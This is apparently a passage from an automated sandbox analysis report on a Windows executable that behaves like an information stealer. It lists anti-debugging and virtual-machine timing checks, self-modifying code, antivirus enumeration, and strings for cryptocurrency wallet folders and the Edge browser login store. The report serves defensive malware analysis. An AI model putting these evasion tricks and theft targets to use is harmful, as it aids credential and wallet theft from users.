              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE555 second address: 6EE569 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEF9Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FBBF10EEF96h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE569 second address: 6EE56D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE6FE second address: 6EE708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EEB75 second address: 6EEB7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EEB7D second address: 6EEB96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEFA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EEB96 second address: 6EEB9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2520 second address: 6F2527 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2527 second address: 6F2568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FBBF0522A63h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FBBF0522A5Ch 0x00000012 jmp 00007FBBF0522A5Ch 0x00000017 jng 00007FBBF0522A62h 0x0000001d jne 00007FBBF0522A56h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F714A second address: 6F714E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F714E second address: 6F715A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F715A second address: 6F715E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F715E second address: 6F7164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F7164 second address: 6F7182 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEFA8h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704555 second address: 704571 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBBF0522A66h 0x00000008 jmp 00007FBBF0522A5Ah 0x0000000d jo 00007FBBF0522A56h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704571 second address: 704575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704575 second address: 704579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706FB7 second address: 706FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706FBB second address: 706FC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706BFB second address: 706BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B09D second address: 71B0C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBBF0522A56h 0x0000000a popad 0x0000000b jbe 00007FBBF0522A5Eh 0x00000011 pop edx 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jbe 00007FBBF0522A56h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B372 second address: 71B380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B380 second address: 71B384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B384 second address: 71B388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B388 second address: 71B3B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FBBF0522A78h 0x0000000c jmp 00007FBBF0522A5Eh 0x00000011 jmp 00007FBBF0522A64h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B3B6 second address: 71B3DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEFA8h 0x00000007 jc 00007FBBF10EEF9Eh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B7E9 second address: 71B816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FBBF0522A56h 0x00000009 jmp 00007FBBF0522A67h 0x0000000e jc 00007FBBF0522A56h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B816 second address: 71B81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71FDB0 second address: 71FDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 723891 second address: 7238A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBF10EEFA0h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7238A9 second address: 7238AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C473 second address: 72C480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C480 second address: 72C494 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0522A60h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730F4D second address: 730F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FBBF10EEF96h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730F5E second address: 730F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72EE51 second address: 72EE58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72EE58 second address: 72EE80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBBF0522A68h 0x00000008 jns 00007FBBF0522A56h 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73DDF5 second address: 73DE13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBF10EEF9Dh 0x00000009 jmp 00007FBBF10EEF9Dh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73DE13 second address: 73DE38 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jg 00007FBBF0522A56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007FBBF0522A66h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F48F second address: 73F495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F495 second address: 73F49D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 741694 second address: 7416A6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBBF10EEF9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7416A6 second address: 7416B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBBF0522A56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7416B0 second address: 7416B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74406D second address: 744071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744071 second address: 7440A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBF10EEFA5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FBBF10EEFA2h 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7440A2 second address: 7440AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7440AA second address: 7440AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75BD27 second address: 75BD46 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FBBF0522A62h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C089 second address: 75C08F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C08F second address: 75C093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C1EE second address: 75C1F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C1F3 second address: 75C207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBBF0522A5Eh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C4BC second address: 75C4C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FBBF10EEF96h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C635 second address: 75C63B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75CA55 second address: 75CA64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBBF10EEF9Ah 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75CA64 second address: 75CA6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75CA6C second address: 75CA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75FCF3 second address: 75FCF8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990165 second address: 499016B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499016B second address: 499016F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499016F second address: 4990173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A06CF second address: 49A0726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0522A69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FBBF0522A5Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ax, 0953h 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 mov ebx, 2F4BA666h 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FBBF0522A68h 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0726 second address: 49A072C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A072C second address: 49A0746 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0522A5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0746 second address: 49A074C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A074C second address: 49A076D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FBBF0522A5Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov esi, 49CA44F3h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A076D second address: 49A0772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0772 second address: 49A083A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBBF0522A65h 0x00000008 mov esi, 7C4DD037h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, esi 0x00000011 jmp 00007FBBF0522A5Ah 0x00000016 mov esi, dword ptr [ebp+0Ch] 0x00000019 jmp 00007FBBF0522A60h 0x0000001e test esi, esi 0x00000020 jmp 00007FBBF0522A60h 0x00000025 je 00007FBC615D064Bh 0x0000002b pushad 0x0000002c mov ax, di 0x0000002f popad 0x00000030 cmp dword ptr [75AB459Ch], 05h 0x00000037 pushad 0x00000038 call 00007FBBF0522A65h 0x0000003d mov cx, E0E7h 0x00000041 pop ecx 0x00000042 pushfd 0x00000043 jmp 00007FBBF0522A5Dh 0x00000048 or si, CD56h 0x0000004d jmp 00007FBBF0522A61h 0x00000052 popfd 0x00000053 popad 0x00000054 je 00007FBC615E86D8h 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d pushfd 0x0000005e jmp 00007FBBF0522A5Ah 0x00000063 xor ax, 9F78h 0x00000068 jmp 00007FBBF0522A5Bh 0x0000006d popfd 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A083A second address: 49A086E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FBBF10EEFA4h 0x0000000c add eax, 22C439D8h 0x00000012 jmp 00007FBBF10EEF9Bh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, esi 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d mov edx, eax 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A08E7 second address: 49A0929 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBBF0522A62h 0x00000008 add esi, 0FD58358h 0x0000000e jmp 00007FBBF0522A5Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FBBF0522A65h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0929 second address: 49A0963 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEFA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FBBF10EEF9Ah 0x00000013 or ecx, 4BEA4818h 0x00000019 jmp 00007FBBF10EEF9Bh 0x0000001e popfd 0x0000001f movzx eax, bx 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0963 second address: 49A0969 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0969 second address: 49A096D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A096D second address: 49A0971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0971 second address: 49A098B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBBF10EEF9Fh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 4CE9A4 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 4CEA29 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 6740B7 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 69AC99 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 67B768 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 4CE96E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 6FC95D instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\file.exe TID: 1468 Thread sleep time: -150000s >= -30000s
              Source: C:\Users\user\Desktop\file.exe TID: 1468 Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: file.exe, file.exe, 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW1
              Source: file.exe, 00000001.00000002.1447480635.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: file.exe, 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
              Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe File opened: NTICE
              Source: C:\Users\user\Desktop\file.exe File opened: SICE
              Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
              Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004B0F10 LdrInitializeThunk, 1_2_004B0F10

              HIPS / PFW / Operating System Protection Evasion

              Source: file.exe, 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: vProgram Manager
              Source: file.exe Binary or memory string: yvProgram Manager
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1433134397.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1447480635.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1382385573.0000000000B81000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: file.exe PID: 6636, type: MEMORYSTR
              Source: Yara match File source: sslproxydump.pcap, type: PCAP
              Source: file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
              Source: file.exe, 00000001.00000003.1312488858.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\ElectronCash\wallets
              Source: file.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: file.exe, 00000001.00000002.1447480635.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
              Source: file.exe, 00000001.00000003.1335200391.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ata%\\Exodus\\exodus
              Source: file.exe String found in binary or memory: Wallets/Exodus
              Source: file.exe, 00000001.00000003.1312424888.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Binance
              Source: file.exe, 00000001.00000002.1447480635.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
              Source: file.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exe String found in binary or memory: keystore
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
